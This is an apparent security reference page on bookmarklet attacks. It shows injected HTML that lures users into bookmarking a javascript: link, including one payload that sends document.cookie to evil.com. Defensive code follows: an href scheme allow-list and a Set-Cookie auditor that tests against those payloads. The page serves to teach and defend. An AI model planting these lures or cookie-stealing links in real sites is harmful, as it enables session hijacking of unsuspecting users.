# Bookmarklet Attack

If attackers can inject arbitrary HTML or JavaScript into the target website, they can trick victims into executing malicious code through a bookmarklet: a bookmark whose URL uses the `javascript:` scheme, so that the code runs in the context of whatever page is open when the bookmark is clicked.

### Exploitation <a href="#exploitation" id="exploitation"></a>

#### Malicious Links <a href="#malicious-links" id="malicious-links"></a>

Attackers induce victims to drag a malicious `javascript:` link into the bookmark menu, for example with injected HTML such as the following.

```
<p>Drag and drop the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/'">Example.com</a>
```

In addition, if the website does not set the **`HttpOnly`** flag on its **`Set-Cookie`** response header, the bookmarklet can read the victim's cookies through `document.cookie` and send them to the malicious website, as below.

```
<p>Drag and drop the following link into the bookmark menu to access easily!</p>
<a href="javascript:window.location='https://evil.com/?c='+document.cookie">Example.com</a>
```
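Both variants above depend on two weaknesses on the target site: an attacker-controlled `href` that is allowed to carry a `javascript:` URL, and a session cookie that omits `HttpOnly`. The following JavaScript is an added example (not code from the original page or its reference) showing the checks a defender would run for each: `safeHref` allow-lists URL schemes the way a browser parses them, and `auditSetCookie` reports cookie attributes that are missing. The page origin `https://example.com/` and the sample header values are assumptions constructed for the example.

```javascript
// Added example (not from the original page): defensive checks for the two
// weaknesses the bookmarklet attack relies on.
//   1. user-controlled href values that carry a javascript: (or data:) URL
//   2. Set-Cookie headers without HttpOnly, leaving the cookie readable
//      through document.cookie by any script running on the page

const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Return a normalised, allow-listed href, or null if the link must be dropped.
// Parsing with the WHATWG URL class mirrors browser behaviour: leading and
// trailing whitespace and embedded tab/newline characters are removed before
// the scheme is read, so "\tJavaScript:alert(1)" is still seen as javascript:.
// A deny-list on the raw string would miss such obfuscated forms.
function safeHref(href, base = "https://example.com/") {
  // base: assumed page origin; relative links resolve against it
  if (typeof href !== "string") return null;
  let url;
  try {
    url = new URL(href, base);
  } catch {
    return null; // unparseable input is rejected rather than guessed at
  }
  return SAFE_SCHEMES.has(url.protocol) ? url.href : null;
}

// Parse one Set-Cookie header value and list the attributes that limit what
// an injected script or bookmarklet can do with the cookie.
function auditSetCookie(headerValue) {
  const parts = headerValue.split(";").map((p) => p.trim()).filter(Boolean);
  const [nameValue, ...attrs] = parts;
  const name = nameValue.split("=")[0].trim();
  // Attribute names are case-insensitive; value-less attributes map to ""
  const flags = new Map(
    attrs.map((a) => {
      const [k, ...v] = a.split("=");
      return [k.trim().toLowerCase(), v.join("=").trim()];
    })
  );
  const findings = [];
  if (!flags.has("httponly")) findings.push("missing HttpOnly: readable via document.cookie");
  if (!flags.has("secure")) findings.push("missing Secure: sent over plain HTTP");
  if (!flags.has("samesite")) findings.push("no explicit SameSite: browser default applies");
  return { name, findings, ok: findings.length === 0 };
}

// Constructed samples, including the two payloads quoted on this page
const sampleLinks = [
  "javascript:window.location='https://evil.com/'",
  "javascript:window.location='https://evil.com/?c='+document.cookie",
  "\tJavaScript:alert(1)",
  "data:text/html,x",
  "/login",
];
for (const link of sampleLinks) {
  console.log(JSON.stringify(link), "->", safeHref(link));
}
console.log(auditSetCookie("session=abc123; Path=/"));
console.log(auditSetCookie("session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"));
```

`safeHref` only filters the scheme; it deliberately does not decide whether an `http(s):` destination is trustworthy, which is a separate origin policy. `auditSetCookie` is meant to run over the `Set-Cookie` headers of a test response, so that a session cookie without `HttpOnly` is caught before an injection point can be combined with it.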

### References <a href="#references" id="references"></a>

* [SOCRadar: CSP Bypass Unveiled, The Hidden Threat of Bookmarklets](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/)
